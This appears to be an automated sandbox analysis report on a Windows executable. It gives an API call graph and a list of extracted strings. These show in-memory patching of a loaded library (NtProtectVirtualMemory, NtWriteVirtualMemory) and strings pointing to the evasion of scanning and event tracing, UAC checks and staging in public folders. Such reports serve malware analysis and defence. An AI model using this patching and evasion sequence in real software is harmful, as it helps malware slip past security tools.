                                                                                                    execution_graph 42966 330c850 42967 330c867 42966->42967 42968 330c892 RegOpenKeyA 42967->42968 42969 330c8a0 42968->42969 42977 32b4ca4 42969->42977 42971 330c8b8 42972 330c8c5 RegSetValueExA RegCloseKey 42971->42972 42983 32b47ac 42972->42983 42978 32b4c58 42977->42978 42979 32b4c93 42978->42979 42991 32b484c 42978->42991 42979->42971 42981 32b4c6f 42981->42979 42996 32b2cc8 11 API calls 42981->42996 42985 32b47b2 42983->42985 42984 32b47d8 42987 32b4788 42984->42987 42985->42984 43006 32b2cc8 11 API calls 42985->43006 42988 32b47a9 42987->42988 42989 32b478e 42987->42989 42989->42988 43007 32b2cc8 11 API calls 42989->43007 42992 32b4850 42991->42992 42993 32b4874 42991->42993 42997 32b2cac 42992->42997 42993->42981 42995 32b485d 42995->42981 42996->42979 42998 32b2cb0 42997->42998 42998->42995 42999 32b2dd5 42998->42999 43000 32b2cba 42998->43000 43004 32b686c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 42998->43004 43005 32b2da4 7 API calls 42999->43005 43000->42995 43003 32b2df6 43003->42995 43004->42999 43005->43003 43006->42985 43007->42988 43008 3319740 43018 32b68b8 43008->43018 43012 331976e 43023 33180a8 timeSetEvent 43012->43023 43014 3319778 43015 3319786 GetMessageA 43014->43015 43016 3319796 43015->43016 43017 331977a TranslateMessage DispatchMessageA 43015->43017 43017->43015 43019 32b68c3 43018->43019 43024 32b4444 43019->43024 43022 32b4558 SysAllocStringLen SysFreeString SysReAllocStringLen 43022->43012 43023->43014 43025 32b448a 43024->43025 43026 32b4503 43025->43026 43027 32b4694 43025->43027 43038 32b43dc 43026->43038 43029 32b46c5 43027->43029 43033 32b46d6 43027->43033 43044 32b4608 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 43029->43044 43032 32b46cf 43032->43033 43034 32b471b FreeLibrary 43033->43034 43035 32b473f 43033->43035 43034->43033 43036 32b4748 43035->43036 43037 32b474e ExitProcess 43035->43037 43036->43037 43039 
32b441f 43038->43039 43040 32b43ec 43038->43040 43039->43022 43040->43039 43045 32b1668 43040->43045 43049 33195f8 43040->43049 43063 32b5b78 43040->43063 43044->43032 43067 32b15fc 43045->43067 43047 32b1670 VirtualAlloc 43048 32b1687 43047->43048 43048->43040 43050 3319670 43049->43050 43051 3319612 GetVersion 43049->43051 43050->43040 43069 32f7438 GetCurrentProcessId 43051->43069 43055 3319636 43101 32c7200 44 API calls 43055->43101 43057 3319640 43102 32c71ac 44 API calls 43057->43102 43059 3319650 43103 32c71ac 44 API calls 43059->43103 43061 3319660 43104 32c71ac 44 API calls 43061->43104 43064 32b5b88 GetModuleFileNameA 43063->43064 43065 32b5ba4 43063->43065 43284 32b5ddc GetModuleFileNameA RegOpenKeyExA 43064->43284 43065->43040 43068 32b159c 43067->43068 43068->43047 43105 32b96ec 43069->43105 43073 32f7481 43074 32f748b GlobalAddAtomA GetCurrentThreadId 43073->43074 43075 32b96ec 42 API calls 43074->43075 43076 32f74c5 43075->43076 43077 32b47dc 11 API calls 43076->43077 43078 32f74d2 43077->43078 43079 32f74dc GlobalAddAtomA 43078->43079 43114 32b4c4c 43079->43114 43083 32f7509 43120 32f7040 43083->43120 43085 32f7513 43128 32f6dec 43085->43128 43087 32f751f 43132 3301550 43087->43132 43089 32f7532 43149 3302758 43089->43149 43091 32f7548 43166 32c72ec 44 API calls 43091->43166 43093 32f7572 GetModuleHandleA 43094 32f7592 43093->43094 43095 32f7582 GetProcAddress 43093->43095 43096 32b4788 11 API calls 43094->43096 43095->43094 43097 32f75a7 43096->43097 43098 32b4788 11 API calls 43097->43098 43099 32f75af 43098->43099 43100 32c7160 44 API calls 43099->43100 43100->43055 43101->43057 43102->43059 43103->43061 43104->43050 43167 32b9700 43105->43167 43108 32b47dc 43109 32b47e0 43108->43109 43112 32b47f0 43108->43112 43111 32b484c 11 API calls 43109->43111 43109->43112 43110 32b481e 43110->43073 43111->43112 43112->43110 43197 32b2cc8 11 API calls 43112->43197 43115 32b4c50 RegisterWindowMessageA 43114->43115 43116 32c7b44 43115->43116 43117 32c7b4a 
43116->43117 43118 32c7b5f InitializeCriticalSection 43117->43118 43119 32c7b74 43118->43119 43119->43083 43121 32f71ad 43120->43121 43122 32f7054 SetErrorMode 43120->43122 43121->43085 43123 32f7078 GetModuleHandleA GetProcAddress 43122->43123 43124 32f7094 43122->43124 43123->43124 43125 32f718f SetErrorMode 43124->43125 43126 32f70a1 LoadLibraryA 43124->43126 43125->43085 43126->43125 43127 32f70bd 10 API calls 43126->43127 43127->43125 43129 32f6df2 43128->43129 43198 32f6fdc 43129->43198 43131 32f6e60 43131->43087 43133 330155a 43132->43133 43211 32cd8bc 43133->43211 43135 3301570 43215 330190c LoadCursorA 43135->43215 43138 33015a9 43139 33015e5 GetDC GetDeviceCaps ReleaseDC 43138->43139 43140 330161b 43139->43140 43220 32d1ffc 43140->43220 43142 3301627 43143 32d1ffc 13 API calls 43142->43143 43144 3301639 43143->43144 43145 32d1ffc 13 API calls 43144->43145 43146 330164b 43145->43146 43224 3301d3c 43146->43224 43148 3301658 43148->43089 43150 3302767 43149->43150 43151 32cd8bc 42 API calls 43150->43151 43152 330277d 43151->43152 43153 330283a LoadIconA 43152->43153 43262 32d753c 43153->43262 43155 330285d GetModuleFileNameA OemToCharA 43156 33028a6 43155->43156 43157 33028cc CharNextA CharLowerA 43156->43157 43158 33028f4 43157->43158 43264 32cea38 GetClassInfoA 43158->43264 43161 3302916 43274 3302aac 60 API calls 43161->43274 43162 330291d 43275 3304b2c 11 API calls 43162->43275 43165 330293f 43165->43091 43166->43093 43168 32b9726 43167->43168 43170 32b9759 43168->43170 43180 32b92f4 42 API calls 43168->43180 43171 32b97c3 43170->43171 43178 32b9776 43170->43178 43191 32b4878 43171->43191 43173 32b97b7 43175 32b4ed4 11 API calls 43173->43175 43174 32b96fb 43174->43108 43175->43174 43176 32b4788 11 API calls 43176->43178 43178->43173 43178->43176 43181 32b4ed4 43178->43181 43190 32b92f4 42 API calls 43178->43190 43180->43170 43182 32b4ee1 43181->43182 43189 32b4f11 43181->43189 43183 32b4f0a 43182->43183 43185 32b4eed 43182->43185 43186 32b484c 11 API 
calls 43183->43186 43184 32b4788 11 API calls 43187 32b4efb 43184->43187 43196 32b2ce0 11 API calls 43185->43196 43186->43189 43187->43178 43189->43184 43190->43178 43192 32b484c 11 API calls 43191->43192 43193 32b4888 43192->43193 43194 32b4788 11 API calls 43193->43194 43195 32b48a0 43194->43195 43195->43174 43196->43187 43197->43110 43199 32f6fe4 43198->43199 43201 32f6feb 43198->43201 43200 32f6fe9 43199->43200 43204 32f7027 SendMessageA 43199->43204 43205 32f7016 SystemParametersInfoA 43199->43205 43200->43131 43202 32f6ff8 43201->43202 43203 32f7001 43201->43203 43209 32f6f6c 6 API calls 43202->43209 43210 32f6f3c SystemParametersInfoA 43203->43210 43204->43200 43205->43200 43208 32f7008 43208->43131 43209->43200 43210->43208 43212 32cd8c3 43211->43212 43213 32cd8e8 43212->43213 43242 32cda78 42 API calls 43212->43242 43213->43135 43216 330192b 43215->43216 43217 3301944 LoadCursorA 43216->43217 43219 3301593 GetKeyboardLayout 43216->43219 43243 33019c8 43217->43243 43219->43138 43221 32d2002 43220->43221 43246 32d1508 43221->43246 43223 32d2024 43223->43142 43225 3301d55 43224->43225 43226 3301d87 SystemParametersInfoA 43225->43226 43227 3301db2 GetStockObject 43226->43227 43228 3301d9a CreateFontIndirectA 43226->43228 43257 32d244c 16 API calls 43227->43257 43256 32d244c 16 API calls 43228->43256 43231 3301db0 43232 3301dc6 SystemParametersInfoA 43231->43232 43233 3301de6 CreateFontIndirectA 43232->43233 43234 3301e1a 43232->43234 43258 32d244c 16 API calls 43233->43258 43260 32d2530 16 API calls 43234->43260 43237 3301dff CreateFontIndirectA 43259 32d244c 16 API calls 43237->43259 43238 3301e2a GetStockObject 43261 32d244c 16 API calls 43238->43261 43241 3301e18 43241->43148 43242->43213 43244 32b2cac 11 API calls 43243->43244 43245 33019db 43244->43245 43245->43216 43247 32d1523 43246->43247 43254 32d14f0 EnterCriticalSection 43247->43254 43249 32d152d 43251 32b2cac 11 API calls 43249->43251 43253 32d158a 43249->43253 43251->43253 43252 32d15db 
43252->43223 43255 32d14fc LeaveCriticalSection 43253->43255 43254->43249 43255->43252 43256->43231 43257->43232 43258->43237 43259->43241 43260->43238 43261->43241 43263 32d7548 43262->43263 43263->43155 43265 32cea68 43264->43265 43266 32cea91 43265->43266 43267 32cea76 UnregisterClassA 43265->43267 43268 32cea87 RegisterClassA 43265->43268 43276 32b738c 43266->43276 43267->43268 43268->43266 43270 32ceadc 43270->43161 43270->43162 43271 32ceabf 43271->43270 43280 32ce97c 43271->43280 43273 32cead3 SetWindowLongA 43273->43270 43274->43162 43275->43165 43283 32b2ffc 43276->43283 43278 32b739f CreateWindowExA 43279 32b73d9 43278->43279 43279->43271 43281 32ce98c VirtualAlloc 43280->43281 43282 32ce9ba 43280->43282 43281->43282 43282->43273 43283->43278 43285 32b5e5f 43284->43285 43286 32b5e1f RegOpenKeyExA 43284->43286 43302 32b5c18 12 API calls 43285->43302 43286->43285 43287 32b5e3d RegOpenKeyExA 43286->43287 43287->43285 43289 32b5ee8 lstrcpynA GetThreadLocale GetLocaleInfoA 43287->43289 43293 32b5f1f 43289->43293 43294 32b6002 43289->43294 43290 32b5e84 RegQueryValueExA 43291 32b5ec2 RegCloseKey 43290->43291 43292 32b5ea4 RegQueryValueExA 43290->43292 43291->43065 43292->43291 43293->43294 43296 32b5f2f lstrlenA 43293->43296 43294->43065 43297 32b5f47 43296->43297 43297->43294 43298 32b5f6c lstrcpynA LoadLibraryExA 43297->43298 43299 32b5f94 43297->43299 43298->43299 43299->43294 43300 32b5f9e lstrcpynA LoadLibraryExA 43299->43300 43300->43294 43301 32b5fd0 lstrcpynA LoadLibraryExA 43300->43301 43301->43294 43302->43290 43303 32b1d08 43304 32b1d18 43303->43304 43305 32b1da0 43303->43305 43307 32b1d5c 43304->43307 43308 32b1d25 43304->43308 43306 32b1da9 43305->43306 43312 32b1ff4 43305->43312 43314 32b1dc1 43306->43314 43318 32b1ec0 43306->43318 43309 32b17c0 10 API calls 43307->43309 43310 32b1d30 43308->43310 43351 32b17c0 43308->43351 43333 32b1d73 43309->43333 43311 32b2088 43312->43311 43316 32b2048 43312->43316 43317 32b2004 43312->43317 43313 32b1dc8 
43314->43313 43321 32b1de4 43314->43321 43325 32b1e98 43314->43325 43323 32b204e 43316->43323 43326 32b17c0 10 API calls 43316->43326 43324 32b17c0 10 API calls 43317->43324 43319 32b1f18 43318->43319 43330 32b1ef1 Sleep 43318->43330 43341 32b1f31 43318->43341 43320 32b17c0 10 API calls 43319->43320 43319->43341 43337 32b1fc8 43320->43337 43331 32b1e15 Sleep 43321->43331 43343 32b1e38 43321->43343 43322 32b1d99 43340 32b201e 43324->43340 43328 32b17c0 10 API calls 43325->43328 43342 32b205d 43326->43342 43327 32b1d55 43345 32b1ea1 43328->43345 43329 32b2043 43330->43319 43334 32b1f0b Sleep 43330->43334 43335 32b1e2d Sleep 43331->43335 43331->43343 43332 32b1d3d 43332->43327 43375 32b1b28 43332->43375 43333->43322 43339 32b1b28 8 API calls 43333->43339 43334->43318 43335->43321 43337->43341 43344 32b1b28 8 API calls 43337->43344 43338 32b1eb9 43339->43322 43340->43329 43346 32b1b28 8 API calls 43340->43346 43342->43329 43347 32b1b28 8 API calls 43342->43347 43348 32b1fec 43344->43348 43345->43338 43349 32b1b28 8 API calls 43345->43349 43346->43329 43350 32b2080 43347->43350 43349->43338 43352 32b17d8 43351->43352 43353 32b1a04 43351->43353 43363 32b1867 Sleep 43352->43363 43366 32b17ea 43352->43366 43354 32b19d4 43353->43354 43355 32b1b1c 43353->43355 43359 32b19e3 Sleep 43354->43359 43368 32b1a22 43354->43368 43357 32b1720 VirtualAlloc 43355->43357 43358 32b1b25 43355->43358 43356 32b17f9 43356->43332 43360 32b175b 43357->43360 43361 32b174b 43357->43361 43358->43332 43362 32b19f9 Sleep 43359->43362 43359->43368 43360->43332 43392 32b16e0 43361->43392 43362->43354 43363->43366 43367 32b1880 Sleep 43363->43367 43365 32b18c8 43373 32b1668 VirtualAlloc 43365->43373 43374 32b18d4 43365->43374 43366->43356 43366->43365 43369 32b18a6 Sleep 43366->43369 43367->43352 43370 32b1668 VirtualAlloc 43368->43370 43372 32b1a40 43368->43372 43369->43365 43371 32b18bc Sleep 43369->43371 43370->43372 43371->43366 43372->43332 43373->43374 43374->43332 43376 32b1c08 43375->43376 
43377 32b1b3d 43375->43377 43378 32b1784 43376->43378 43379 32b1b43 43376->43379 43377->43379 43382 32b1baf Sleep 43377->43382 43381 32b1d02 43378->43381 43384 32b16e0 2 API calls 43378->43384 43380 32b1b4c 43379->43380 43383 32b1be7 Sleep 43379->43383 43389 32b1c1d 43379->43389 43380->43327 43381->43327 43382->43379 43385 32b1bc9 Sleep 43382->43385 43386 32b1bfd Sleep 43383->43386 43383->43389 43387 32b1791 VirtualFree 43384->43387 43385->43377 43386->43379 43388 32b17a9 43387->43388 43388->43327 43390 32b1c9c VirtualFree 43389->43390 43391 32b1c40 43389->43391 43390->43327 43391->43327 43393 32b171d 43392->43393 43394 32b16e9 43392->43394 43393->43360 43394->43393 43395 32b16eb Sleep 43394->43395 43396 32b1700 43395->43396 43396->43393 43397 32b1704 Sleep 43396->43397 43397->43394 43398 32d7674 MulDiv 43399 32d76c6 43398->43399 43400 32d76b0 43398->43400 43414 32d021c 43399->43414 43464 32d7630 GetDC SelectObject GetTextMetricsA ReleaseDC 43400->43464 43403 32d76d2 43418 32d02bc 43403->43418 43405 32d76b5 43405->43399 43465 32b4820 43405->43465 43410 32d7719 43415 32d0222 43414->43415 43416 32d02bc 14 API calls 43415->43416 43417 32d023a 43416->43417 43417->43403 43419 32d02c9 43418->43419 43420 32d02e3 43418->43420 43421 32d02cf RegCloseKey 43419->43421 43422 32d02d9 43419->43422 43424 32d0320 43420->43424 43421->43422 43423 32d028c 13 API calls 43422->43423 43423->43420 43425 32b4820 11 API calls 43424->43425 43426 32d0349 43425->43426 43428 32d0369 43426->43428 43475 32b4cec 11 API calls 43426->43475 43429 32d038b RegOpenKeyExA 43428->43429 43430 32d039d 43429->43430 43435 32d03d9 43429->43435 43431 32d03c7 43430->43431 43476 32b4b0c 43430->43476 43485 32d02e8 13 API calls 43431->43485 43434 32d03d4 43439 32b4788 11 API calls 43434->43439 43436 32d03f6 RegOpenKeyExA 43435->43436 43437 32d0408 43436->43437 43443 32d0441 43436->43443 43438 32d0432 43437->43438 43440 32b4b0c 11 API calls 43437->43440 43486 32d02e8 13 API calls 43438->43486 43441 32d04b9 
43439->43441 43440->43438 43441->43410 43449 32d0550 43441->43449 43444 32d045b RegOpenKeyExA 43443->43444 43444->43434 43445 32d046d 43444->43445 43446 32d0497 43445->43446 43447 32b4b0c 11 API calls 43445->43447 43487 32d02e8 13 API calls 43446->43487 43447->43446 43488 32d0528 43449->43488 43452 32d05b9 43455 32b4788 11 API calls 43452->43455 43453 32d056a 43454 32b4878 11 API calls 43453->43454 43456 32d0575 43454->43456 43461 32d05ae 43455->43461 43491 32d05c8 43456->43491 43458 32d058d 43459 32d05b0 43458->43459 43462 32d0599 43458->43462 43497 32d01b4 42 API calls 43459->43497 43469 32d028c 43461->43469 43463 32b4ed4 11 API calls 43462->43463 43463->43461 43464->43405 43467 32b4824 43465->43467 43466 32b4848 43466->43399 43467->43466 43503 32b2cc8 11 API calls 43467->43503 43470 32d02b8 43469->43470 43471 32d0296 43469->43471 43470->43410 43472 32d029c RegFlushKey 43471->43472 43473 32d02a2 RegCloseKey 43471->43473 43472->43473 43474 32b4788 11 API calls 43473->43474 43474->43470 43475->43428 43477 32b4b1d 43476->43477 43478 32b4b5a 43477->43478 43479 32b4b43 43477->43479 43481 32b484c 11 API calls 43478->43481 43480 32b4ed4 11 API calls 43479->43480 43483 32b4b50 43480->43483 43481->43483 43482 32b4b8b 43483->43482 43484 32b47dc 11 API calls 43483->43484 43484->43482 43485->43434 43486->43434 43487->43434 43498 32d04d8 43488->43498 43490 32d053c 43490->43452 43490->43453 43492 32b4c4c 43491->43492 43493 32d05ee RegQueryValueExA 43492->43493 43494 32d05fc 43493->43494 43496 32d061b 43493->43496 43502 32bc184 42 API calls 43494->43502 43496->43458 43497->43461 43499 32d04f1 43498->43499 43500 32d0505 RegQueryValueExA 43499->43500 43501 32d051c 43500->43501 43501->43490 43502->43496 43503->43466 43504 32c6760 43506 32c6771 43504->43506 43507 32c679a 43504->43507 43506->43507 43509 32c792c 43506->43509 43513 32b37c4 43506->43513 43510 32c7936 43509->43510 43511 32c794a 43510->43511 43519 32c78b8 42 API calls 43510->43519 43511->43506 43514 32b37f3 43513->43514 
43515 32b3822 CompareStringA 43514->43515 43516 32b3842 43515->43516 43517 32b4788 11 API calls 43516->43517 43518 32b384a 43517->43518 43518->43506 43519->43511 43520 331809c 43523 330cb08 43520->43523 43524 330cb10 43523->43524 43524->43524 45698 32b2f9c QueryPerformanceCounter 43524->45698 43526 330cb32 45701 32b2fc4 43526->45701 43528 330cb3c InetIsOffline 43529 330cb46 43528->43529 43530 330cb57 43528->43530 43531 32b47dc 11 API calls 43529->43531 43532 32b47dc 11 API calls 43530->43532 43533 330cb55 43531->43533 43534 330cb66 43532->43534 43533->43534 43535 32b4b0c 11 API calls 43534->43535 43536 330cb84 43535->43536 43537 32b4c4c 43536->43537 43538 330cb8c 43537->43538 43539 330cb96 43538->43539 45702 32b4a98 43539->45702 43541 330cbaf 43542 32b4c4c 43541->43542 43543 330cbb7 43542->43543 43544 330cbc1 43543->43544 45717 32cfd40 43544->45717 43547 32b4b0c 11 API calls 43548 330cbe8 43547->43548 43549 330cbf0 43548->43549 43550 330cbfa 43549->43550 43551 32b4a98 11 API calls 43550->43551 43552 330cc13 43551->43552 43553 32b4c4c 43552->43553 43554 330cc1b 43553->43554 43555 330cc25 43554->43555 43556 32cfd40 21 API calls 43555->43556 43557 330cc2e 43556->43557 43558 32b4b0c 11 API calls 43557->43558 43559 330cc4c 43558->43559 43560 330cc54 43559->43560 43561 32b4a98 11 API calls 43560->43561 43562 330cc77 43561->43562 43563 32b4c4c 43562->43563 43564 330cc7f 43563->43564 43565 32cfd40 21 API calls 43564->43565 43566 330cc92 43565->43566 43567 32b4b0c 11 API calls 43566->43567 43568 330ccb0 43567->43568 43569 330ccb8 43568->43569 43570 330ccc2 43569->43570 43571 32b4a98 11 API calls 43570->43571 43572 330ccdb 43571->43572 43573 32b4c4c 43572->43573 43574 330cce3 43573->43574 43575 32cfd40 21 API calls 43574->43575 43576 330ccf6 43575->43576 43577 32b4b0c 11 API calls 43576->43577 43578 330cd14 43577->43578 43579 330cd1c 43578->43579 43580 330cd26 43579->43580 43581 32b4a98 11 API calls 43580->43581 43582 330cd3f 43581->43582 43583 32b4c4c 43582->43583 43584 
330cd47 43583->43584 43585 330cd51 43584->43585 43586 32cfd40 21 API calls 43585->43586 43587 330cd5a 43586->43587 43588 32b4b0c 11 API calls 43587->43588 43589 330cd78 43588->43589 43590 330cd80 43589->43590 43591 32b4a98 11 API calls 43590->43591 43592 330cda3 43591->43592 43593 32b4c4c 43592->43593 43594 330cdab 43593->43594 43595 330cdb5 43594->43595 43596 32cfd40 21 API calls 43595->43596 43597 330cdbe 43596->43597 43598 32b4b0c 11 API calls 43597->43598 43599 330cddc 43598->43599 43600 330cde4 43599->43600 43601 32b4a98 11 API calls 43600->43601 43602 330ce07 43601->43602 43603 32b4c4c 43602->43603 43604 330ce0f 43603->43604 43605 32cfd40 21 API calls 43604->43605 43606 330ce22 43605->43606 45729 32b4980 43606->45729 45699 32b2fa9 45698->45699 45700 32b2fb4 GetTickCount 45698->45700 45699->43526 45700->43526 45701->43528 45703 32b4afd 45702->45703 45704 32b4a9c 45702->45704 45705 32b47dc 45704->45705 45706 32b4aa4 45704->45706 45710 32b484c 11 API calls 45705->45710 45712 32b47f0 45705->45712 45706->45703 45707 32b4ab3 45706->45707 45709 32b47dc 11 API calls 45706->45709 45711 32b484c 11 API calls 45707->45711 45708 32b481e 45708->43541 45709->45707 45710->45712 45714 32b4acd 45711->45714 45712->45708 45731 32b2cc8 11 API calls 45712->45731 45715 32b47dc 11 API calls 45714->45715 45716 32b4af9 45715->45716 45716->43541 45718 32cfd54 45717->45718 45719 32cfd77 LoadLibraryExA 45718->45719 45720 32b4c4c 45719->45720 45721 32cfd85 GetModuleHandleA 45720->45721 45722 32b4c4c 45721->45722 45723 32cfd98 GetProcAddress GetCurrentProcess NtProtectVirtualMemory 45722->45723 45732 32cfd34 45723->45732 45725 32cfdda GetCurrentProcess NtWriteVirtualMemory GetCurrentProcess NtFlushInstructionCache FreeLibrary 45726 32cfe1d 45725->45726 45727 32b47ac 11 API calls 45726->45727 45728 32cfe2a 45727->45728 45728->43547 45730 32b4986 45729->45730 45731->45708 45732->45725 45733 32b51e4 45734 32b51f1 45733->45734 45738 32b51f8 45733->45738 45742 32b4f38 SysAllocStringLen 
45734->45742 45739 32b4f58 45738->45739 45740 32b4f5e SysFreeString 45739->45740 45741 32b4f64 45739->45741 45740->45741 45742->45738
                                                                                                    APIs
                                                                                                    • InetIsOffline.URL(00000000,00000000,03317507,?,?,?,000002A6,00000000,00000000), ref: 0330CB3D
                                                                                                      • Part of subcall function 032CFD40: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD78
                                                                                                      • Part of subcall function 032CFD40: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFD86
                                                                                                      • Part of subcall function 032CFD40: GetProcAddress.KERNEL32(74F60000,00000000), ref: 032CFD9F
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDBB
                                                                                                      • Part of subcall function 032CFD40: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000,032CFE2B), ref: 032CFDC1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDEB
                                                                                                      • Part of subcall function 032CFD40: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000,00000000,00000000), ref: 032CFDF1
                                                                                                      • Part of subcall function 032CFD40: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000,00000000), ref: 032CFDFA
                                                                                                      • Part of subcall function 032CFD40: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000,00000000), ref: 032CFE00
                                                                                                      • Part of subcall function 032CFD40: FreeLibrary.KERNEL32(74F60000,00000000,00000000,00000000,00000000,0333035C,Function_00006ADC,00000004,03330360,00000000,0333035C,17D783FC,00000040,00000004,74F60000,00000000), ref: 032CFE0B
                                                                                                      • Part of subcall function 032B8DE0: GetFileAttributesA.KERNEL32(00000000,?,0330D60A,ScanString,03330350,0331753C,OpenSession,03330350,0331753C,ScanString,03330350,0331753C,UacScan,03330350,0331753C,UacInitialize), ref: 032B8DEB
                                                                                                      • Part of subcall function 0330B780: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0330B850), ref: 0330B7BB
                                                                                                      • Part of subcall function 0330B780: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0330B850), ref: 0330B7EB
                                                                                                      • Part of subcall function 0330B780: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0330B800
                                                                                                      • Part of subcall function 0330B780: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0330B82C
                                                                                                      • Part of subcall function 0330B780: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0330B835
                                                                                                      • Part of subcall function 032B8E04: GetFileAttributesA.KERNEL32(00000000,?,03310668,ScanString,03330350,0331753C,OpenSession,03330350,0331753C,OpenSession,03330350,0331753C,ScanBuffer,03330350,0331753C,ScanString), ref: 032B8E0F
                                                                                                      • Part of subcall function 032B8FCC: CreateDirectoryA.KERNEL32(00000000,00000000,?,0331070E,ScanBuffer,03330350,0331753C,ScanString,03330350,0331753C,OpenSession,03330350,0331753C,OpenSession,03330350,0331753C), ref: 032B8FD9
                                                                                                      • Part of subcall function 0330B69C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0330B76E), ref: 0330B6DB
                                                                                                      • Part of subcall function 0330B69C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0330B715
                                                                                                      • Part of subcall function 0330B69C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0330B742
                                                                                                      • Part of subcall function 0330B69C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0330B74B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2323148800.00000000032B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2323101813.00000000032B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.000000000331A000.00000004.00001000.00020000.00000000.sdmp
                                                                                                     • Associated: 00000000.00000002.2323447937.0000000003424000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_32b0000_Fpopgapwdcgvxn.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Path$CurrentProcess$AttributesCloseCreateLibraryMemoryNameName_VirtualWrite$AddressCacheDirectoryFlushFreeHandleInetInformationInstructionLoadModuleOfflineOpenProcProtectQueryRead
                                                                                                    • String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
                                                                                                    • API String ID: 3974040814-596226238
                                                                                                    • Opcode ID: 92c467c60c1f17b5badc12feb3e202ab64e431e38f9e2d765a8660ec563550d8
                                                                                                    • Instruction ID: 9aabf9902ccb16589fc4a6f4c5d3a2bf723aa0bc69cbd7de9809f989367c81bc
                                                                                                    • Opcode Fuzzy Hash: 92c467c60c1f17b5badc12feb3e202ab64e431e38f9e2d765a8660ec563550d8
                                                                                                    • Instruction Fuzzy Hash: D4F31039A202199FDB19FB65DDC0ADEB3B9AF44340F5440E5E109AF256DB70AEC18F44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
